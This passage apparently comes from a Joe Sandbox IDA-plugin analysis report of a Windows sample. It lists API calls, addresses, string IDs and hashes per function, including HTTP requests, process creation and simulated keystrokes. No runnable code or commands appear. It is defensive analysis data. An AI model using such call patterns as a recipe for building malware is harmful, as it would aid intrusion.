                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
                                                          • Instruction ID: 54a2c79dd0e5dd300c4e984aa774cfef33a299f9bb0c04edd65e69cdb90ae413
                                                          • Opcode Fuzzy Hash: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
                                                          • Instruction Fuzzy Hash: 7E31D279600208FFDF329F54ED88F6A37ADEB56311F138629FA01CA1A1DBB49D409B54
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0036FAA6
                                                          • OleUninitialize.OLE32(?,00000000), ref: 0036FB45
                                                          • UnregisterHotKey.USER32(?), ref: 0036FC9C
                                                          • DestroyWindow.USER32(?), ref: 003A45D6
                                                          • FreeLibrary.KERNEL32(?), ref: 003A463B
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003A4668
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
                                                          • Instruction ID: f9151d903fa88e7a1682ca0294e1c797bbb18a0a783b0532f3acbd0704c09a86
                                                          • Opcode Fuzzy Hash: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
                                                          • Instruction Fuzzy Hash: 95A15831701212CFCB2AEF14D995A69F7A4FF56700F1582ADE80AAB265CB70AD16CF50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: ,,?$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-1974717164
                                                          • Opcode ID: f88e17369e59c780aa5890393a9120ab23b7ba0d88ab9d2ffeeb447840429d04
                                                          • Instruction ID: 9a7209d5ab0b6927d4aeac4aa2599f82439873f2efc1e81d544ffe3786caaafd
                                                          • Opcode Fuzzy Hash: f88e17369e59c780aa5890393a9120ab23b7ba0d88ab9d2ffeeb447840429d04
                                                          • Instruction Fuzzy Hash: 2791AE72A00209ABDF26DFA5DC48FAEBBB8EF45710F10855BF515AB280D7709945CFA0
                                                          APIs
                                                          • EnumChildWindows.USER32(?,003BA439), ref: 003BA377
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
                                                          • Instruction ID: b2f44d562d12013f37647763c16515b41dc8d511752d04a60322e2c0f03abed0
                                                          • Opcode Fuzzy Hash: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
                                                          • Instruction Fuzzy Hash: 7F91D830A00E05ABDB4AEFA4C482BEDFBB4FF04308F54C519D959AB641DF316999CB91
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00362EAE
                                                            • Part of subcall function 00361DB3: GetClientRect.USER32(?,?), ref: 00361DDC
                                                            • Part of subcall function 00361DB3: GetWindowRect.USER32(?,?), ref: 00361E1D
                                                            • Part of subcall function 00361DB3: ScreenToClient.USER32(?,?), ref: 00361E45
                                                          • GetDC.USER32 ref: 0039CD32
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0039CD45
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0039CD53
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0039CD68
                                                          • ReleaseDC.USER32(?,00000000), ref: 0039CD70
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0039CDFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
                                                          • Instruction ID: 5d835b087b54c05bd90f21f32c112e53b38f840d26886d731459ff26c5b70301
                                                          • Opcode Fuzzy Hash: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
                                                          • Instruction Fuzzy Hash: 0B71D031900605DFCF239F64C884AAA7BB9FF49320F15927AED595A2AAC7318C41DF60
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D1A50
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003D1A7C
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003D1ABE
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003D1AD3
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1AE0
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003D1B10
                                                          • InternetCloseHandle.WININET(00000000), ref: 003D1B57
                                                            • Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
                                                            • Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
                                                          • Instruction ID: 3c6c7a278c04b11905eefa6eea3639b0b315e8e75dd66b54c78fbd307499695b
                                                          • Opcode Fuzzy Hash: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
                                                          • Instruction Fuzzy Hash: E5413DB2501219BFEB129F60DC85FBB7BACEB08354F004127FD059A281E7B49E449BA0
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003EF910), ref: 003D8D28
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003EF910), ref: 003D8D5C
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003D8ED6
                                                          • SysFreeString.OLEAUT32(?), ref: 003D8F00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
                                                          • Instruction ID: e261311493107671eeb3c727b162029f0bb1fb4a8966abbc905c7bbbbdfe2f88
                                                          • Opcode Fuzzy Hash: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
                                                          • Instruction Fuzzy Hash: B7F16872A00209EFCF16DF94D884EAEB7B9FF48314F11819AF905AB251DB31AE45CB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 003DF6B5
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF848
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF86C
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8AC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8CE
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003DFA4A
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003DFA7C
                                                          • CloseHandle.KERNEL32(?), ref: 003DFAAB
                                                          • CloseHandle.KERNEL32(?), ref: 003DFB22
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 64acf25f0039d4cc20c89b5a01b54b6836989495f781e54d6b7d05c6db0e3b1d
                                                          • Instruction ID: b3ddf490465bbf4c46deee1d52a7c8888b75ce806d351f920417eee7b0c6efc5
                                                          • Opcode Fuzzy Hash: 64acf25f0039d4cc20c89b5a01b54b6836989495f781e54d6b7d05c6db0e3b1d
                                                          • Instruction Fuzzy Hash: 0CE1A1326043409FC716EF24D891B6ABBE5AF85354F14856EF89A9F3A2CB30DC45CB52
                                                          APIs
                                                            • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B
                                                            • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4
                                                            • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003C4D40
                                                          • _wcscmp.LIBCMT ref: 003C4D5A
                                                          • MoveFileW.KERNEL32(?,?), ref: 003C4D75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
                                                          • Instruction ID: c518a42cdcab5a9d56a96c0dac2c18090ab6b936ae15b6982e32f8d4e2760f91
                                                          • Opcode Fuzzy Hash: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
                                                          • Instruction Fuzzy Hash: 905165B20083859BC726EB60D895EDFB3ECAF85350F40492EF585D7152EF70A688C756
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003E86FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
                                                          • Instruction ID: 0524806be2f364ec5b5395a8147dd65dd199e8f0b018ec60b1b487f5f893ae3e
                                                          • Opcode Fuzzy Hash: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
                                                          • Instruction Fuzzy Hash: 0D51B530A002E4BFDF229F26CC85FAD7B68AB05310F614715FA59EA1E0CF71A980DB40
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0039C2F7
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039C319
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0039C331
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0039C34F
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0039C370
                                                          • DestroyIcon.USER32(00000000), ref: 0039C37F
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0039C39C
                                                          • DestroyIcon.USER32(?), ref: 0039C3AB
                                                            • Part of subcall function 003EA4AF: DeleteObject.GDI32(00000000), ref: 003EA4E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
                                                          • Instruction ID: 3bba8f2ecf74d22c9e3f017e1edc3b86fea46967909e6d64f232d77293b5ec6e
                                                          • Opcode Fuzzy Hash: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
                                                          • Instruction Fuzzy Hash: 14517C74610605AFDF22DF64CC85FAB3BB9EB08310F118628F9429B2D0D7B0AD90DB50
                                                          APIs
                                                            • Part of subcall function 003BA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BA84C
                                                            • Part of subcall function 003BA82C: GetCurrentThreadId.KERNEL32 ref: 003BA853
                                                            • Part of subcall function 003BA82C: AttachThreadInput.USER32(00000000,?,003B9683,?,00000001), ref: 003BA85A
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B968E
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003B96AB
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003B96AE
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96B7
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003B96D5
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96D8
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96E1
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003B96F8
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
                                                          • Instruction ID: 5d61e4cf4015083de972b247b9499f2ac73a87fb6daf043890d7de454b75d611
                                                          • Opcode Fuzzy Hash: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
                                                          • Instruction Fuzzy Hash: AD11CEB1910618BFF6226B60DC89FAA7F2DEB4C764F100525F344AF1E0C9F25C109AA4
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 003B892A
                                                          • HeapAlloc.KERNEL32(00000000), ref: 003B8931
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 003B8946
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 003B894E
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 003B8951
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 003B8961
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 003B8969
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 003B896C
                                                          • CreateThread.KERNEL32(00000000,00000000,003B8992,00000000,00000000,00000000), ref: 003B8986
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
                                                          • Instruction ID: cfb14c482e2fceb6f6a2920f2038ac54513626d741ee901c6d8e3c831c874592
                                                          • Opcode Fuzzy Hash: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
                                                          • Instruction Fuzzy Hash: F401AC75240348FFE621ABA5DC89F673B6CEB89711F418521FA05DF1D1CAB09800CA20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 277c7e15a8cb27a106eb6d0c8148279afd4e8791e6dacce3906ba5c0903ae9e9
                                                          • Instruction ID: 0855be69574a56336767982d699426c0ff42bf74c5f77b6e3b17c248ef952b76
                                                          • Opcode Fuzzy Hash: 277c7e15a8cb27a106eb6d0c8148279afd4e8791e6dacce3906ba5c0903ae9e9
                                                          • Instruction Fuzzy Hash: F4C19372A002199FDF11DF98E884BAEB7F9FB48314F15856BE905AB380E7709D45CB90
                                                          APIs
                                                            • Part of subcall function 003B710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
                                                            • Part of subcall function 003B710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
                                                            • Part of subcall function 003B710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
                                                            • Part of subcall function 003B710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003D9806
                                                          • _memset.LIBCMT ref: 003D9813
                                                          • _memset.LIBCMT ref: 003D9956
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003D9982
                                                          • CoTaskMemFree.OLE32(?), ref: 003D998D
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 003D99DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: d5b7361f1cb5576fb337c5b7a65d65aa64e52aeb31839994075f5a9ac43eb5f5
                                                          • Instruction ID: 0d10bd74bb95c825e84af7af6f581df7de1f77f251985e7d3ae3a9a38b988c40
                                                          • Opcode Fuzzy Hash: d5b7361f1cb5576fb337c5b7a65d65aa64e52aeb31839994075f5a9ac43eb5f5
